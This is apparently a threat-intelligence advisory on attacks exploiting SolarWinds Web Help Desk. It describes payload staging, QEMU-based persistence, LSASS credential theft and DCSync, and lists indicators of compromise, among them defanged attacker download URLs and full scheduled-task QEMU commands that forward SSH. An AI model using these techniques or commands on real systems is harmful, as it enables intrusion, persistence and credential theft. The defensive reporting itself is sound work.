Summary
Threat actors are actively exploiting critical vulnerabilities in internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve unauthenticated remote code execution. These intrusions follow a high-impact pattern where a single unpatched application serves as a gateway for lateral movement and full domain compromise. Once inside, attackers deploy a mix of legitimate remote monitoring tools and specialized command-and-control frameworks to maintain persistent access. While the specific vulnerabilities exploited are not actively identified, CVE-2025-40551 was recently added to CISA’s Known Exploited Vulnerabilities database, CVE-2025-40536, and CVE-2025-26399 was just recently discussed by Microsoft and other vendors who have also observed active in-the-wild exploitation. Security teams are urged to patch all WHD versions prior to 12.8.7 HF1 immediately and monitor unauthorized administrative tool installations.
Technical Analysis
The exploit chain begins when the vulnerable WHD service wrapper spawns a Java process that initiates PowerShell or cmd[.]exe to retrieve malicious payloads via BITS or msiexec. These payloads often include the Zoho ManageEngine RMM agent, which threat actors use to conduct hands-on-keyboard reconnaissance of Active Directory environments. In several instances, attackers utilized the file-hosting services Catbox and Supabase to stage malicious MSI installers while registering agents to anonymous Proton Mail accounts.
Persistence is frequently established through reverse SSH tunnels and the creation of scheduled tasks designed to launch QEMU virtual machines, effectively masking malicious traffic within a virtualized SYSTEM context. To further evade detection, threat actors perform DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, facilitating direct access to LSASS memory and credential theft. Lateral movement follows textbook patterns, starting with domain computer enumeration and escalating to DCSync attacks that request password data directly from domain controllers.
Defenders have also observed the deployment of Velociraptor, a legitimate forensics tool, repurposed as a command-and-control framework through customized configuration files pointing to Cloudflare Workers.
Remediation requires the immediate isolation of compromised hosts, rotation of high-privilege service credentials, and the thorough removal of unauthorized RMM artifacts like TOOLSIQ.EXE.
Indicators of Compromise
Huntress provided the following Indicators of Compromise for revie and ingestion related to recent SolarWinds exploitation.
Indicator |
Description |
|
https[:]//files.catbox[.]moe/tmp9fc.msi SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189 |
Zoho Meetings Installer |
|
https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi SHA256: |
Velociraptor Installer |
https[:]//auth.qgtxtebl.workers[.]dev/ |
Velociraptor Server URL |
https[:]//github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi |
Cloudfared Installer |
|
https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/code.txt C:\ProgramData\Microsoft\code.exe SHA256: 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4 |
Portable version of VSCode |
https[:]//62c4cbb992274c32922cfbb49d623bd1.us-central1.gcp.cloud.es[.]io |
Elastic Search URL |
esmahyft@proton[.]me |
Zoho Assist Account Email |
v2-api.mooo[.]com |
Velociraptor Failover Domain |
client.config[.]yaml |
Velociraptor Config File |
|
Task Path: C:\Windows\System32\Tasks\TPMProfiler Command: C:\Users\[user]\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22 |
Scheduled Task (persistence) |
|
Task Path: C:\Windows\System32\Tasks\TPMProfiler Command: C[:]\Users\[user]\local\qemu-system-x86_64 -m 1G -smp 1 -hda bisrv.dll -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::32567-:22 |
Scheduled Task (persistence) |
